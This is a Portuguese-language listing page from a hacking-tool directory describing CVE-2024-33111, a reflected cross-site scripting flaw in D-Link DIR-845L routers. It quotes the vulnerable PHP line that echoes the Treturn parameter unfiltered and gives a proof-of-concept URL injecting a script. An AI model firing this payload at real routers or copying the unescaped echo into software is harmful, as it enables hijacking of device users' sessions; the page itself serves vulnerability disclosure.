Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-33111 — O roteador D-Link DIR-845L é vulnerável a Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php. | Kitploit
Ferramentas/GitHubGitHub/fallenskill1/cve-2024-33111
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubfallenskill1/cve-2024-33111

CVE-2024-33111

O roteador D-Link DIR-845L é vulnerável a Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-33111

Roteadores D-Link DIR-845L versão 1.01KRb03 e anteriores são vulneráveis a Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Componente Vulnerável

  • /htdocs/webinc/js/bsc_sms_inbox.php

Detalhes Técnicos

A vulnerabilidade deve-se à falta de filtragem no parâmetro $_GET["Treturn"] que é diretamente usado no código na linha 17 de bsc_sms_inbox.php.

O trecho de código vulnerável:

root@kitploit:~
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

root@kitploit:~
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

imagem

Baixar ferramenta